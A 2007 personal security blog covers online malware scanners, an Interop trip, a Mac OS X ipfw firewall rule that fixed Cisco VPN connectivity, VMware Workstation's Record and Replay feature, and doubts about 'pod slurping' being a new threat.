Thursday, July 19, 2007

Addendum: Online Malware Scanners

I posted last fall about online scanners that I like to use when doing malware research. Here's a quick addition: "Anubis: Analyzing Unknown Binaries"

Anubis is excellent and much more in-depth than anything else currently available for free.

I'm back...

After much debate on whether or not to continue blogging, I decided to give it another shot and just not worry so much about the perfection that I typically seek when publishing content. I will try to be more fluid and less focused on making everything I post absolutely perfect which is what causes me to take *so very long* to put up posts and even not post because of the production effort.

So, I'm back...we'll see how it goes.

Sunday, May 20, 2007

Off to Interop in Las Vegas!

I'll be hopping on a plane with Sarah destined for Las Vegas in about 6 hours. CMP is sending me out there as a judge for the Best of Interop security category. It should be a fun and exciting experience to finally meet face-to-face with many of the vendors I've only spoken with via e-mail or on the phone. Also, Sarah and I will get to take in the many sights of Vegas and see at least one show while we are there. Of course, I do have to thank Jordan for having a baby so I could take his place on the trip!

During the day and most of the evenings, my schedule is fully booked between judges' meetings, a VIP reception and wine tasting, vendor meetings, walking the expo floor, checking out the Interop labs and a poker tournament. One of the highlights is getting to meet with Kevin Mandia from Mandiant. He co-authored the first book I ever read on incident response and has assembled an excellent team at Mandiant that includes Jamie Butler and Kris Kendall. It should be interesting. I plan on getting more info on their upcoming tool called Caprica Six (any BSG fans reading this? ;-).

Wednesday, March 14, 2007

Mac OS X 10.4.9 fixes Cisco VPN client and ipfw

But, they don't mention it in their "About the Mac OS X 10.4.9 Update (delta)" page. I bring it up because this is an issue that I've been dealing with for the year and a half that I've had my 12" PowerBook G4. Every time I connected to the VPN at work using the Cisco VPN client, I suddenly couldn't browse the web, check e-mail, etc. After digging around some logs, I found that TCP fragments were being blocked by the Mac OS X firewall (ipfw) according to /var/log/ipfw.log. The following command fixed things.

sudo ipfw add 05000 allow tcp from any to any frag

So, a week ago, one of our network engineers came to Jordan who sent him on to me about a problem a big Apple user on campus was having with the VPN. I was inserted into the conversation and told them about my "fix" for the problem. At some point in the thread after discussing how normal end users could never do this, an Apple e-mail address was CC'ed.

A week later, 10.4.9 is released. I rebooted this morning after the update and connected to the VPN about 15 mins ago. As I was typing the "fix," Mac Mail alerts me that I have new mail. Huh? How did it work? I didn't put the "fix" in as a permanent rule. Let's check the ipfw rules...

02065 allow tcp from any to any frag


How nice of them to fix the problem. I checked Apple's support site to see if it was mentioned in the update...of course not! Just another silent fix from Apple. Thanks fellas!

Thursday, March 01, 2007

VMware: Record and Replay

About 3 hours before the event, I heard that VMware was going to be on-campus to recruit students. Big deal. IBM's ISS stopped by at our SIT meeting last week. Well, actually it was a big deal...and no, not because of the free pizza and soda, although I'm sure that's the only reason a fourth of the students were there. No, I was there because they were giving away free VMware Workstation licenses. You might say that VMware Server and Player are free, but they are missing some of the seriously bad@ss functionality that Workstation possesses.

For example, multiple snapshots. I REALLY wish the free server version supported this feature. I use VMware server a lot both for UF and freelance work. My Stack-o-Hack currently has four machines with Ubuntu 6.10 Server and VMware Server...but I digress.

So, at the meeting, the guy presenting talked about a new feature being released in VMware Workstation 6. It is called Record and Replay. What does it do? You hit the RECORD button and it records EVERYTHING about your virtual machine until you stop it. Of course, it takes up lots of space, but it records CPU registers, memory and freaking network traffic! How wicked is that? Vulnerability researchers and exploit writers rejoice!

Take a look at the blog entry from VMware.

And, for you Intel Mac users that are testing VMware Fusion and are annoyed that snapshots are not officially supported, don't worry. Beta 2 next week will have it supported with pretty little "Take Snapshot" and "Revert to Snapshot" buttons. I saw it on a 17" MacBook Pro that one of the VMware employees had. I knew Jordan would be so excited about it, I took a picture with my phone and sent it to him!

Tuesday, February 27, 2007

Time to slurp...er, uhm, catch up!

I'll be catching up soon. Things have been busy with my family, UF, NWC and DRSI. I've got several interesting entries lined up related to work, freelancing and things I've been doing with the SIT.

For now, check out this "bleeding threat" article... "Pod Slurping: The latest data threat."

When you're done reading it, take a look at the following two pages and tell me how pod slurping is "the latest data threat." Oh wait, if you tacked on "...from 2005," then it might make better sense. Note that slurp.exe was created in June 2005.

Sep 5, 2005 - Podslurping and Bluesnarfing - The latest IT threats

Feb 20, 2006 - iPods Slurp Secrets